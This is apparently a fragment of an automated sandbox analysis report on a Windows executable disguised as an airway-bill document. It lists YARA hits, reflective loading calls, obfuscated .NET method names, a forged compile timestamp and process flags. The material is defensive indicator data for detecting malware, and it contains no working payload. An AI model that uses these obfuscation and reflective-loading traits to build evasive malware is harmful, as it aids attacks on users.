                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.40c9970.7.raw.unpack, V4uC3Iifq56IKQcfry.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.9480000.12.raw.unpack, V4uC3Iifq56IKQcfry.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.7fb0000.11.raw.unpack, xlI4iAklxGArgVrnMs.cs.Net Code: aUKg2Ju9Kb System.Reflection.Assembly.Load(byte[])
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c8f810.6.raw.unpack, xlI4iAklxGArgVrnMs.cs.Net Code: aUKg2Ju9Kb System.Reflection.Assembly.Load(byte[])
                        Source: Yara matchFile source: 3.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c33bf0.9.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c4dc10.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c4dc10.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c33bf0.9.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.1735740544.0000000004C4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1734651878.000000000313D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1735740544.0000000004AB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe PID: 5516, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe PID: 6536, type: MEMORYSTR
                        Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeStatic PE information: 0xC420D92E [Mon Apr 9 08:11:26 2074 UTC]
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeCode function: 0_2_0568B038 push 00000005h; ret 0_2_0568B050
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeCode function: 0_2_07C93E3A push ds; ret 0_2_07C93E3B
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeCode function: 3_2_00402AC0 push eax; ret 3_2_00402AD4
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeCode function: 3_2_00402AC0 push eax; ret 3_2_00402AFC
                        Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeStatic PE information: section name: .text entropy: 7.93845583971947
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.7fb0000.11.raw.unpack, xlI4iAklxGArgVrnMs.csHigh entropy of concatenated method names: 'qIQMTpWrWt', 'hcqML81XaH', 'OHeMxPBRjO', 'HC8MEUhXJb', 'U0rM3gUcHF', 'HjoMHPGaKa', 'MZHMBotVbE', 'VREMkaXNu0', 'SnIMKHuy6H', 'TyFMl2oYfd'
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.7fb0000.11.raw.unpack, SuAEeQc8I3vT7aTCms.csHigh entropy of concatenated method names: 'b1pB4oNlyq', 'voFBCdqliQ', 'KiaB22MBg0', 'm2HB0tGwy5', 'vi6Bmh3kJh', 'RQyBODOPOB', 'jt5BDWbvIP', 'dxWBaTdQIL', 'XbgB9tT2gq', 'SFBB8hgjtk'
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.7fb0000.11.raw.unpack, TTQH6QxdPXeNjJNoSn.csHigh entropy of concatenated method names: 'Dispose', 'sSXub5IFax', 'SWDhslUISZ', 'GiE33XVdcK', 'D8iuJJ0DND', 'PJluzX1dFB', 'ProcessDialogKey', 'gfohvaBhcw', 'VZvhuAC3Ji', 'pEBhhZrvj5'
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.7fb0000.11.raw.unpack, J1AubU8Cj2WQPf1o7M.csHigh entropy of concatenated method names: 'Vl93ms0S6n', 'aPT3Dqe5ht', 'tKhEWIKyPi', 'xiaESjU2Cy', 'K42E6B1X7h', 'E7OEtEuVb8', 'BFJEpMLfiv', 'agTEdd3c7i', 'icjEcRNyMQ', 'HFdEYOs9kH'
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.7fb0000.11.raw.unpack, RneVnmja3TaUfmP2sr.csHigh entropy of concatenated method names: 'nq8Nl2R5nn', 'oAQNydbvKq', 'ToString', 'rRWNL8YTjg', 'Ts3NxX2UlA', 'eOxNECyR4r', 'o2PN39lPaH', 'MrDNHmlh8D', 'mgUNBj7sJa', 'oITNkwRlt7'
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.7fb0000.11.raw.unpack, Oj8WJmh7ZwG5taFvHE.csHigh entropy of concatenated method names: 'heN2tuJDL', 'lB307JD4b', 'dR2OwKSmJ', 'niJD0ObYo', 'SBl9Xtakm', 'fgn8Sgkls', 'xZkMDugGbokLcgaXYL', 'Rar5aJyDhu0kF3tTvZ', 'vn0ejLauS', 'HFiGjZL8K'
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.7fb0000.11.raw.unpack, FiJ0DNQD5JlX1dFBEf.csHigh entropy of concatenated method names: 'zRBeL2qN6m', 'YudexvSjQb', 'aebeEw6QOv', 'GO0e39lt9V', 'cSMeHVpE7G', 'U9yeB4GAHo', 'I7mekKtU9n', 'qhneK16VX7', 'f5oelOIFjO', 'vsdeyBDhEI'
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.7fb0000.11.raw.unpack, B9Op3HRAQghurniPAZ.csHigh entropy of concatenated method names: 'eQlVahW75o', 'jBLV9sLY1M', 'EtTVZ7DGdk', 'LljVs5sR2A', 'w2wVSXMFjl', 'wC4V6vXx2k', 'LeDVp7Agaa', 'JX7VdnvwRs', 'YLmVYY6SSB', 'BBMVUGnLkq'
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.7fb0000.11.raw.unpack, xQkALIzXG59GrjeogD.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'fjYIV4hatZ', 'NKuIXo1GnY', 'fgRIFKabMM', 'NhIINNpDfe', 'MBVIeU9j0d', 'v5dIIcle81', 'SnxIGMUAj4'
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.7fb0000.11.raw.unpack, kLxMMAw7KmIH5Fx1oS.csHigh entropy of concatenated method names: 'ToString', 'zUDFUhlJ3r', 'MXiFs0hUZv', 'qOsFWANpMB', 'MveFShg9ui', 'qFGF6yBMIj', 'uB5FtIJErW', 'ic4FpgcjjE', 'tykFdJCfvb', 'zldFcdiSrl'
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.7fb0000.11.raw.unpack, Nx7spOZFc8C3EVoR0m.csHigh entropy of concatenated method names: 'jX4HT0aqKm', 'Xk8HxnZcLw', 'm5eH3qZTwh', 'ChqHBHhm2U', 'yLLHkHYOHO', 'OZO3o4lYC6', 'xSG3fYGZiY', 'oso3rNA0Gg', 'M1q3Quo2RI', 'Ayc3b3WUla'
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.7fb0000.11.raw.unpack, sCSDUluMB1aWn7VZ9rF.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'jIHGPMdJM2', 'NJ2GAQNYOB', 'sOnGwwRqLZ', 'FVuGjV5bTH', 'Xu7Go4J3Ka', 'TD3Gf1HS0N', 'f0sGrY6IgX'
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.7fb0000.11.raw.unpack, NCRonW9CNF9QtoUBCa.csHigh entropy of concatenated method names: 'omOE0tgJRG', 'aArEObQPiN', 'xoaEawhlN1', 'GQpE9irjsf', 'HZdEXxwpRt', 'TJwEFcmvyp', 'QMZEN8BZjF', 'xQhEeVeXwd', 'VcPEI6BCRV', 'IPfEGe7Esq'
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.7fb0000.11.raw.unpack, xDtpkpElYJ2Ai095nL.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'a8Nhbe92tc', 'OdDhJOuiL7', 'acNhzBN90N', 'd7yMv7Jjwm', 'MLvMue93ny', 'rQwMhBwShV', 'mT4MMeqoSj', 'UpmXjiFRd5oTueylsqI'
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.7fb0000.11.raw.unpack, j7jAn3fLnEhc2oUuwj.csHigh entropy of concatenated method names: 'GtYNQ04RBF', 'X3DNJjZ4fn', 'zeeev67Q3r', 'u9XeuhMZSX', 'aG4NU2bffW', 'q7HN5q31HM', 'fkyNRnYfga', 'vLFNPqibUp', 'zPlNA2yjBT', 'lG2NwVYtEb'
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.7fb0000.11.raw.unpack, UaBhcwbrZvAC3JiFEB.csHigh entropy of concatenated method names: 'SCueZpb5WD', 'vPheshmXVg', 'DrkeWUYcn5', 'kaaeSMkScS', 'BW9eP3Yj0o', 'mEde6LbGAl', 'Next', 'Next', 'Next', 'NextBytes'
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.7fb0000.11.raw.unpack, PaRybap7lJOiB4GDgn.csHigh entropy of concatenated method names: 'krdBLtBdwP', 'farBE0YfeV', 'rZWBHgaYwm', 'Oy3HJeKwPv', 'jDkHzIMET6', 'm2JBvJDEpR', 'Q0QBukFaPF', 'PB2BhlcyN3', 'qbJBMrgS22', 'nENBgqN8sO'
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.7fb0000.11.raw.unpack, Grvj5UJhfZRvk38vCF.csHigh entropy of concatenated method names: 'B9mIuyhu7y', 'qxMIMtDTUo', 'fHeIgruJk0', 'iChILbtYCn', 'kD0Ixf7ElJ', 'SrTI3bXnfX', 'amsIHsWqSp', 'hsperAmsMw', 'CiTeQtrm57', 'bdfebXM7RU'
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.7fb0000.11.raw.unpack, StL8WvaNclbdmwJqfH.csHigh entropy of concatenated method names: 'JWixP7ReaT', 'B4fxAdXHXq', 'o0dxwKY2Gt', 'q6KxjV1P4y', 'pffxoNywcP', 'erNxfEmGHg', 'nXqxreKDg3', 'VkZxQPQBep', 'TnUxbFH92S', 'ratxJ5cxrO'
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.7fb0000.11.raw.unpack, rpOlCkPe18lFvoF12b.csHigh entropy of concatenated method names: 'lUnXYUo3YS', 'mUWX5C0fmS', 'mnOXPXxD2x', 'SpUXAgp70V', 'bGxXs2RRUP', 'gu3XW3opM9', 'AQpXSJGQWR', 'wN2X6thMn8', 'ztiXtN2ZLQ', 'YygXpLJQDp'
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.7fb0000.11.raw.unpack, xrEFMlggE8ooeyiF8K.csHigh entropy of concatenated method names: 'nZwuBtL8Wv', 'qclukbdmwJ', 'HCNulF9Qto', 'OBCuyat1Au', 'U1ouX7Mcx7', 'GpOuFFc8C3', 'S9GobSKvKVvhP0hb70', 'NlGAl5xbSGILUAlq8S', 'HjQuufuIdO', 'aoguMvUDKF'
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.7fb0000.11.raw.unpack, csB7fXuvTlkCxU6v1N8.csHigh entropy of concatenated method names: 'RaiI4UqgfW', 'pJCICD1Qv0', 'dHMI2t6Iy8', 'XmbI0ef4ts', 'tK4ImfccFk', 'TYGIO6BAIK', 'C4xIDKuAo4', 'RcHIah5hoK', 'gYwI9ii3NM', 'Vk4I8HOLhF'
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.7fb0000.11.raw.unpack, PVd1GCtR0bJQQa1mhs.csHigh entropy of concatenated method names: 'EtRHwyOd5Q', 's8EHjPIUF7', 'oI8How0qqF', 'ToString', 'FPDHft4A4Y', 'mhpHrwBnVc', 'Eoa57nROfRNEVC56QQT', 'kauFl4R481U1hqlCBix', 'lOpApYRgwcGxQDjmuJI', 'wSI8TvRyqe69AM1P2rA'
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c8f810.6.raw.unpack, xlI4iAklxGArgVrnMs.csHigh entropy of concatenated method names: 'qIQMTpWrWt', 'hcqML81XaH', 'OHeMxPBRjO', 'HC8MEUhXJb', 'U0rM3gUcHF', 'HjoMHPGaKa', 'MZHMBotVbE', 'VREMkaXNu0', 'SnIMKHuy6H', 'TyFMl2oYfd'
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c8f810.6.raw.unpack, SuAEeQc8I3vT7aTCms.csHigh entropy of concatenated method names: 'b1pB4oNlyq', 'voFBCdqliQ', 'KiaB22MBg0', 'm2HB0tGwy5', 'vi6Bmh3kJh', 'RQyBODOPOB', 'jt5BDWbvIP', 'dxWBaTdQIL', 'XbgB9tT2gq', 'SFBB8hgjtk'
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c8f810.6.raw.unpack, TTQH6QxdPXeNjJNoSn.csHigh entropy of concatenated method names: 'Dispose', 'sSXub5IFax', 'SWDhslUISZ', 'GiE33XVdcK', 'D8iuJJ0DND', 'PJluzX1dFB', 'ProcessDialogKey', 'gfohvaBhcw', 'VZvhuAC3Ji', 'pEBhhZrvj5'
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c8f810.6.raw.unpack, J1AubU8Cj2WQPf1o7M.csHigh entropy of concatenated method names: 'Vl93ms0S6n', 'aPT3Dqe5ht', 'tKhEWIKyPi', 'xiaESjU2Cy', 'K42E6B1X7h', 'E7OEtEuVb8', 'BFJEpMLfiv', 'agTEdd3c7i', 'icjEcRNyMQ', 'HFdEYOs9kH'
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c8f810.6.raw.unpack, RneVnmja3TaUfmP2sr.csHigh entropy of concatenated method names: 'nq8Nl2R5nn', 'oAQNydbvKq', 'ToString', 'rRWNL8YTjg', 'Ts3NxX2UlA', 'eOxNECyR4r', 'o2PN39lPaH', 'MrDNHmlh8D', 'mgUNBj7sJa', 'oITNkwRlt7'
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c8f810.6.raw.unpack, Oj8WJmh7ZwG5taFvHE.csHigh entropy of concatenated method names: 'heN2tuJDL', 'lB307JD4b', 'dR2OwKSmJ', 'niJD0ObYo', 'SBl9Xtakm', 'fgn8Sgkls', 'xZkMDugGbokLcgaXYL', 'Rar5aJyDhu0kF3tTvZ', 'vn0ejLauS', 'HFiGjZL8K'
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c8f810.6.raw.unpack, FiJ0DNQD5JlX1dFBEf.csHigh entropy of concatenated method names: 'zRBeL2qN6m', 'YudexvSjQb', 'aebeEw6QOv', 'GO0e39lt9V', 'cSMeHVpE7G', 'U9yeB4GAHo', 'I7mekKtU9n', 'qhneK16VX7', 'f5oelOIFjO', 'vsdeyBDhEI'
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c8f810.6.raw.unpack, B9Op3HRAQghurniPAZ.csHigh entropy of concatenated method names: 'eQlVahW75o', 'jBLV9sLY1M', 'EtTVZ7DGdk', 'LljVs5sR2A', 'w2wVSXMFjl', 'wC4V6vXx2k', 'LeDVp7Agaa', 'JX7VdnvwRs', 'YLmVYY6SSB', 'BBMVUGnLkq'
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c8f810.6.raw.unpack, xQkALIzXG59GrjeogD.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'fjYIV4hatZ', 'NKuIXo1GnY', 'fgRIFKabMM', 'NhIINNpDfe', 'MBVIeU9j0d', 'v5dIIcle81', 'SnxIGMUAj4'
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c8f810.6.raw.unpack, kLxMMAw7KmIH5Fx1oS.csHigh entropy of concatenated method names: 'ToString', 'zUDFUhlJ3r', 'MXiFs0hUZv', 'qOsFWANpMB', 'MveFShg9ui', 'qFGF6yBMIj', 'uB5FtIJErW', 'ic4FpgcjjE', 'tykFdJCfvb', 'zldFcdiSrl'
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c8f810.6.raw.unpack, Nx7spOZFc8C3EVoR0m.csHigh entropy of concatenated method names: 'jX4HT0aqKm', 'Xk8HxnZcLw', 'm5eH3qZTwh', 'ChqHBHhm2U', 'yLLHkHYOHO', 'OZO3o4lYC6', 'xSG3fYGZiY', 'oso3rNA0Gg', 'M1q3Quo2RI', 'Ayc3b3WUla'
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c8f810.6.raw.unpack, sCSDUluMB1aWn7VZ9rF.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'jIHGPMdJM2', 'NJ2GAQNYOB', 'sOnGwwRqLZ', 'FVuGjV5bTH', 'Xu7Go4J3Ka', 'TD3Gf1HS0N', 'f0sGrY6IgX'
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c8f810.6.raw.unpack, NCRonW9CNF9QtoUBCa.csHigh entropy of concatenated method names: 'omOE0tgJRG', 'aArEObQPiN', 'xoaEawhlN1', 'GQpE9irjsf', 'HZdEXxwpRt', 'TJwEFcmvyp', 'QMZEN8BZjF', 'xQhEeVeXwd', 'VcPEI6BCRV', 'IPfEGe7Esq'
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c8f810.6.raw.unpack, xDtpkpElYJ2Ai095nL.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'a8Nhbe92tc', 'OdDhJOuiL7', 'acNhzBN90N', 'd7yMv7Jjwm', 'MLvMue93ny', 'rQwMhBwShV', 'mT4MMeqoSj', 'UpmXjiFRd5oTueylsqI'
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c8f810.6.raw.unpack, j7jAn3fLnEhc2oUuwj.csHigh entropy of concatenated method names: 'GtYNQ04RBF', 'X3DNJjZ4fn', 'zeeev67Q3r', 'u9XeuhMZSX', 'aG4NU2bffW', 'q7HN5q31HM', 'fkyNRnYfga', 'vLFNPqibUp', 'zPlNA2yjBT', 'lG2NwVYtEb'
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c8f810.6.raw.unpack, UaBhcwbrZvAC3JiFEB.csHigh entropy of concatenated method names: 'SCueZpb5WD', 'vPheshmXVg', 'DrkeWUYcn5', 'kaaeSMkScS', 'BW9eP3Yj0o', 'mEde6LbGAl', 'Next', 'Next', 'Next', 'NextBytes'
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c8f810.6.raw.unpack, PaRybap7lJOiB4GDgn.csHigh entropy of concatenated method names: 'krdBLtBdwP', 'farBE0YfeV', 'rZWBHgaYwm', 'Oy3HJeKwPv', 'jDkHzIMET6', 'm2JBvJDEpR', 'Q0QBukFaPF', 'PB2BhlcyN3', 'qbJBMrgS22', 'nENBgqN8sO'
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c8f810.6.raw.unpack, Grvj5UJhfZRvk38vCF.csHigh entropy of concatenated method names: 'B9mIuyhu7y', 'qxMIMtDTUo', 'fHeIgruJk0', 'iChILbtYCn', 'kD0Ixf7ElJ', 'SrTI3bXnfX', 'amsIHsWqSp', 'hsperAmsMw', 'CiTeQtrm57', 'bdfebXM7RU'
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c8f810.6.raw.unpack, StL8WvaNclbdmwJqfH.csHigh entropy of concatenated method names: 'JWixP7ReaT', 'B4fxAdXHXq', 'o0dxwKY2Gt', 'q6KxjV1P4y', 'pffxoNywcP', 'erNxfEmGHg', 'nXqxreKDg3', 'VkZxQPQBep', 'TnUxbFH92S', 'ratxJ5cxrO'
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c8f810.6.raw.unpack, rpOlCkPe18lFvoF12b.csHigh entropy of concatenated method names: 'lUnXYUo3YS', 'mUWX5C0fmS', 'mnOXPXxD2x', 'SpUXAgp70V', 'bGxXs2RRUP', 'gu3XW3opM9', 'AQpXSJGQWR', 'wN2X6thMn8', 'ztiXtN2ZLQ', 'YygXpLJQDp'
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c8f810.6.raw.unpack, xrEFMlggE8ooeyiF8K.csHigh entropy of concatenated method names: 'nZwuBtL8Wv', 'qclukbdmwJ', 'HCNulF9Qto', 'OBCuyat1Au', 'U1ouX7Mcx7', 'GpOuFFc8C3', 'S9GobSKvKVvhP0hb70', 'NlGAl5xbSGILUAlq8S', 'HjQuufuIdO', 'aoguMvUDKF'
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c8f810.6.raw.unpack, csB7fXuvTlkCxU6v1N8.csHigh entropy of concatenated method names: 'RaiI4UqgfW', 'pJCICD1Qv0', 'dHMI2t6Iy8', 'XmbI0ef4ts', 'tK4ImfccFk', 'TYGIO6BAIK', 'C4xIDKuAo4', 'RcHIah5hoK', 'gYwI9ii3NM', 'Vk4I8HOLhF'
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.4c8f810.6.raw.unpack, PVd1GCtR0bJQQa1mhs.csHigh entropy of concatenated method names: 'EtRHwyOd5Q', 's8EHjPIUF7', 'oI8How0qqF', 'ToString', 'FPDHft4A4Y', 'mhpHrwBnVc', 'Eoa57nROfRNEVC56QQT', 'kauFl4R481U1hqlCBix', 'lOpApYRgwcGxQDjmuJI', 'wSI8TvRyqe69AM1P2rA'
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.40c9970.7.raw.unpack, V4uC3Iifq56IKQcfry.csHigh entropy of concatenated method names: 'JcqLcnHE8kRk7VHJhl', 'baAwnpSkPWAs4YMGxr', 'wTgrto4LNQ', 'imnL6GCB6AIFRqkhxN', 'RgtTUJcyZL', 'dHYrbjNADO', 'xiCr8b7Qs6', 'PT2rZj37UR', 'P1WruDgOtu', 'd71eKLY6YVFQv'
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.40c9970.7.raw.unpack, vpednoN8EZgsJ4TDwx.csHigh entropy of concatenated method names: 'SvRTLtpnA', 'uJwWpedno', 'REZpgsJ4T', 'uwxys3A5Q', 'Tl3iTkB7U', 'EqRFtDP16', 'TW5lfqidm', 'wSKAUGlNW', 'LkrevaXpK', 'cwu0Op5AT'
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.9480000.12.raw.unpack, V4uC3Iifq56IKQcfry.csHigh entropy of concatenated method names: 'JcqLcnHE8kRk7VHJhl', 'baAwnpSkPWAs4YMGxr', 'wTgrto4LNQ', 'imnL6GCB6AIFRqkhxN', 'RgtTUJcyZL', 'dHYrbjNADO', 'xiCr8b7Qs6', 'PT2rZj37UR', 'P1WruDgOtu', 'd71eKLY6YVFQv'
                        Source: 0.2.Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe.9480000.12.raw.unpack, vpednoN8EZgsJ4TDwx.csHigh entropy of concatenated method names: 'SvRTLtpnA', 'uJwWpedno', 'REZpgsJ4T', 'uwxys3A5Q', 'Tl3iTkB7U', 'EqRFtDP16', 'TW5lfqidm', 'wSKAUGlNW', 'LkrevaXpK', 'cwu0Op5AT'
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeFile created: \awb# 1294440291; 2 ki_n; g.w 3.30 kg.exe
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeFile created: \awb# 1294440291; 2 ki_n; g.w 3.30 kg.exe
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeFile created: \awb# 1294440291; 2 ki_n; g.w 3.30 kg.exe
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeFile created: \awb# 1294440291; 2 ki_n; g.w 3.30 kg.exeJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeFile created: \awb# 1294440291; 2 ki_n; g.w 3.30 kg.exeJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
